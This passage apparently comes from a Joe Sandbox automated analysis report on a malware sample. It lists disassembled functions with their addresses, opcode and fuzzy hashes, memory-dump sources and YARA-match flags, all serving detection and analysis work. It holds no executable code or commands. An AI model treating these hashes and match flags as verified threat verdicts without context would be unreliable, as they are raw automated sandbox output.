                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                                                                                                                          • Opcode ID: 67278b35a64899c4e843d92a3e23c7a93933160186b17761f2465089cb72818a
                                                                                                                                                                                                                                                          • Instruction ID: 019a791d1c25a3c8fe739a31e0a23d423276483b2d618abf22edf044f3024c22
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67278b35a64899c4e843d92a3e23c7a93933160186b17761f2465089cb72818a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF3102722083008FC314DF58D8D166BB7F5FB99318F19483DE69987360E335A918CB66
                                                                                                                                                                                                                                                          Function 0043EB50 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                                          • Opcode ID: 00826e0d4f886e63537347e67f3b42d852862df1b35b6d533ae3730f77ba7a75
                                                                                                                                                                                                                                                          • Instruction ID: c497bc3c17aefed4a2b0ec07c899be2d1253584fb416e3315b0134f03c6467ad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00826e0d4f886e63537347e67f3b42d852862df1b35b6d533ae3730f77ba7a75
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A3102721083009FC314DF58D8C166BB7F5FB8A314F19982DEA85873A1D339A918CB6A
                                                                                                                                                                                                                                                          Function 00429170 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: A%&'
                                                                                                                                                                                                                                                          • API String ID: 0-1522422272
                                                                                                                                                                                                                                                          • Opcode ID: 184964f8b652324f2e113d025011fc4e3a587f1cbb9a8a3454d8662ee6523bd1
                                                                                                                                                                                                                                                          • Instruction ID: 913c420f85954eed9bd1d458c10467abd4bf7e3dae9106fcd3ab7ebdbb23f432
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 184964f8b652324f2e113d025011fc4e3a587f1cbb9a8a3454d8662ee6523bd1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC2109B12483185FE718DF249C56B6FB7A1EB82300F05882CE5858B1C6D678D509C746
                                                                                                                                                                                                                                                          Function 024993D7 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: A%&'
                                                                                                                                                                                                                                                          • API String ID: 0-1522422272
                                                                                                                                                                                                                                                          • Opcode ID: 6c468d9e47f163ecf295c8918dd1b24acd601c3279c28ca58949edf8f5818bcf
                                                                                                                                                                                                                                                          • Instruction ID: 40dbb01a5752c4865bfce18df34b62c757a886d13ec6d68788050666b80a4101
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c468d9e47f163ecf295c8918dd1b24acd601c3279c28ca58949edf8f5818bcf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9210AB12483185FE718DF249C56B6FBBA1DBC2704F05C92CE5868B1C6D678C6098786
                                                                                                                                                                                                                                                          Function 0248C2F3 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: I
                                                                                                                                                                                                                                                          • API String ID: 0-3707901625
                                                                                                                                                                                                                                                          • Opcode ID: 73cf703926595eb476ccce4fa146147637d9604b7af4a04b8eb6030e6fa27180
                                                                                                                                                                                                                                                          • Instruction ID: e682664fcd4416f6c162aa069d6211ec655c3e165560e95556d97aa2e5791c02
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73cf703926595eb476ccce4fa146147637d9604b7af4a04b8eb6030e6fa27180
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6621D532A183518BC3189E68C89135FFBE19B92318F0D967FD4D1972A1C7B8C8098796
                                                                                                                                                                                                                                                          Function 0041C08C Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: I
                                                                                                                                                                                                                                                          • API String ID: 0-3707901625
                                                                                                                                                                                                                                                          • Opcode ID: 73cf703926595eb476ccce4fa146147637d9604b7af4a04b8eb6030e6fa27180
                                                                                                                                                                                                                                                          • Instruction ID: 25dd5030608d8804b3685d06091bb182962033f97911b4a3b6b195a09c05bc12
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73cf703926595eb476ccce4fa146147637d9604b7af4a04b8eb6030e6fa27180
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5221D532A583518BC3148E68C89139BFBE15BD2314F1D9A7ED4D197291C77C88498B86
                                                                                                                                                                                                                                                          Function 0043D010 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: C5pq
                                                                                                                                                                                                                                                          • API String ID: 0-2188916712
                                                                                                                                                                                                                                                          • Opcode ID: fd3e314f0704b203d822c73d32aed4de58c5baba185771a5c6d4afa7d99d76f6
                                                                                                                                                                                                                                                          • Instruction ID: 0d2a52dac7bd84c95214030ab6d11c0dae6afcb66c194cb9d7a8b764e771bff1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd3e314f0704b203d822c73d32aed4de58c5baba185771a5c6d4afa7d99d76f6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAF04670D1E2509FE30CCF30890246777A9EFC7644F28C43CE88287356EA30C922DA68
                                                                                                                                                                                                                                                          Function 00402EE0 Relevance: .7, Instructions: 696COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1a0ec2540cbe78e3f2d196b18f0b566b8230c2f421c0fd3a94d20e5d8c3bdc5d
                                                                                                                                                                                                                                                          • Instruction ID: 6f3f6e217fa160ce5c47ac3ba8c29444a77df25c16127400011b9c3fcb335d97
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a0ec2540cbe78e3f2d196b18f0b566b8230c2f421c0fd3a94d20e5d8c3bdc5d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5452E2315083459FCB14CF14C0806AABFE5FF89305F198A7EE89967381D778EA49CB89
                                                                                                                                                                                                                                                          Function 0248FC77 Relevance: .7, Instructions: 678COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7e26fba6300a6f083d24a2d55453f94dae9ea5b7036511e397063f69fb604f91
                                                                                                                                                                                                                                                          • Instruction ID: 263f08700d5078b65c6276ab4c1fd66378c9aaecc33998f0ecbc2df3a10d7c9a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e26fba6300a6f083d24a2d55453f94dae9ea5b7036511e397063f69fb604f91
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0625BB0619B818ED325CF3C8815797BFE5AB5A324F148A5DE0FA873D2C7756001CB6A
                                                                                                                                                                                                                                                          Function 0041FA10 Relevance: .7, Instructions: 678COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7e26fba6300a6f083d24a2d55453f94dae9ea5b7036511e397063f69fb604f91
                                                                                                                                                                                                                                                          • Instruction ID: 6155c681720684765bf75e9c0fb17a89b40920418519336270cef116b5653186
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e26fba6300a6f083d24a2d55453f94dae9ea5b7036511e397063f69fb604f91
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D626CB0609B808ED325CF3C8815797BFE5AB5A324F148A5DE0FA873D2C7756005CB6A
                                                                                                                                                                                                                                                          Function 02476937 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: bbe0d3e6ef36fb933d9b5ee1474003575081806332f9c17a5e34408ca91fa233
                                                                                                                                                                                                                                                          • Instruction ID: 17e069d122864f1bee03f8c4554cc53be67c7a324a8356a2f3398773641195d4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbe0d3e6ef36fb933d9b5ee1474003575081806332f9c17a5e34408ca91fa233
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8552AFB0908B848FE7358B34C8843E7BBE6AB41314F55482FD9FA06B82D379A985C755
                                                                                                                                                                                                                                                          Function 004066D0 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e69e8a2abeca99dc1e1ab3989addb63fe830d766578d31c350296b713837ee4c
                                                                                                                                                                                                                                                          • Instruction ID: 3029a9d5e0e7f722953d515f50b156050abe03212a902a226f49a86632ee3869
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e69e8a2abeca99dc1e1ab3989addb63fe830d766578d31c350296b713837ee4c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0352D1B0A08B948FE730DB24C4843A7BBE1EB51314F15893ED5EB167C2C37DA995871A
                                                                                                                                                                                                                                                          Function 02477707 Relevance: .6, Instructions: 614COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
                                                                                                                                                                                                                                                          • Instruction ID: f08c22ab1c0d1fa66100344de1db34f38f2f3f082863626706ae7b1aaaa03b8a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E012C2326087118BD725DF18D8806FBF3E2FFC8309F59892ED9A697281D734A951CB81
                                                                                                                                                                                                                                                          Function 004074A0 Relevance: .6, Instructions: 614COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
                                                                                                                                                                                                                                                          • Instruction ID: f7c506ca0572c78bb64cf85289b63f361dc8afc3a54a3446179c7f90162a8508
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b77b3c505813b0ce8e97d1790cf8c1aa02bb344898ec8c7587cc160ab759f003
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E212A532A0C7118BD724DF18D8816ABB3E2FFD4305F19893ED586A7381D678B855CB86
                                                                                                                                                                                                                                                          Function 02486558 Relevance: .6, Instructions: 613COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 4c6e8c4cfc57ff4dd668914b015e59c9e00e9233b7d568ebfdd56b07a4595ae4
                                                                                                                                                                                                                                                          • Instruction ID: d5c9cfdcf59a479f8582786c7c7adb0cf332721f6b17ad9ad40c71f6ea9bcb86
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c6e8c4cfc57ff4dd668914b015e59c9e00e9233b7d568ebfdd56b07a4595ae4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26E144766582118BD768AB14C89177EB797FBC8318F2B813EC9D95B392CB349C02CB41
                                                                                                                                                                                                                                                          Function 02473B87 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c010ba06f4a2554f3df4df2cde2feda57d3bfdacdbd77413d54ee2c2c530f914
                                                                                                                                                                                                                                                          • Instruction ID: 64991d460ee72a37471e9b1e47276165ca760ef4d574b4d53f7c3dcd67405996
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c010ba06f4a2554f3df4df2cde2feda57d3bfdacdbd77413d54ee2c2c530f914
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE3212B0514B118FC378CF29C6905AABBF2BF55610B504A6ED6A78BF90D736F885CB10
                                                                                                                                                                                                                                                          Function 00403920 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: c96ca6233cc43be927f0f203a80893cad1019c4eb3e696bf00876446c9158cdd
                                                                                                                                                                                                                                                          • Instruction ID: d7bcbc88bdf6cfba9bdc99fa284d67c403e95a1d0c78040340162460b82664a7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c96ca6233cc43be927f0f203a80893cad1019c4eb3e696bf00876446c9158cdd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0322470A14B118FC338CF29C680526BBF5BF45711B604A2ED6A7A7B90D73AF945CB18
                                                                                                                                                                                                                                                          Function 024A8897 Relevance: .6, Instructions: 563COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6b9700dbcc9c7b5fddfcdc10bddd65a6860bd28b41b17442a73d505d9a665f44
                                                                                                                                                                                                                                                          • Instruction ID: f12793610bbdd7df445e71ad725eee01dcd733fca3fc50ed4606764463040185
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b9700dbcc9c7b5fddfcdc10bddd65a6860bd28b41b17442a73d505d9a665f44
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5E146726053509BC324DF24C89066BF7E2EBE4354F19892EE9C957354E731EC45CB92
                                                                                                                                                                                                                                                          Function 00438630 Relevance: .6, Instructions: 563COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 91dfba725ab612e4a0151f1bce4eba722cf76487c1c758c9ac25c36a092774d0
                                                                                                                                                                                                                                                          • Instruction ID: 3ebb04d120b9a7b4f1ad73d687debb6db223a5719ecffe96ce511131f4aded75
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91dfba725ab612e4a0151f1bce4eba722cf76487c1c758c9ac25c36a092774d0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AE136726183115BC324DF24C98162BF7E2EBC8314F2A952EF9C867351DB35AC058BD6
                                                                                                                                                                                                                                                          Function 02489395 Relevance: .5, Instructions: 529COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
                                                                                                                                                                                                                                                          • Instruction ID: 2c296d26aef7906563e32756952e4a4c7ef694f083ad3fe01506ea804c24d3ea
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66E1F1719287228BC7209F24C4906BFB7F1FF95B64F199A1EE8C51B360E7749841CB86
                                                                                                                                                                                                                                                          Function 0041912E Relevance: .5, Instructions: 529COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
                                                                                                                                                                                                                                                          • Instruction ID: 7aed7d034054570e623b21814fe3e88dbdb9baf50802d39517b861f70b912fd3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bc3c5a68131538d02fb10a45805bb72a23cda115e809adc80f128025870e758
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29E104719583228BC7208F25C4A06ABF7F1FF95754F198A1EE8C51B360E3789C81C79A
                                                                                                                                                                                                                                                          Function 004144D5 Relevance: .5, Instructions: 475COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 21973073f6d4a0b3311894adcca56d162d87d3c82ed911ab51d4b26430630d86
                                                                                                                                                                                                                                                          • Instruction ID: 3f4607f348259b91e3f3bb69225e26a46c3ad6fe886f003ab5616493c8c42938
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21973073f6d4a0b3311894adcca56d162d87d3c82ed911ab51d4b26430630d86
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80D123B9618200DFE7059F24E842BBBB3A1EB8B714F14582DE5C563291D739EC52CB4A
                                                                                                                                                                                                                                                          Function 02492A17 Relevance: .5, Instructions: 451COMMON
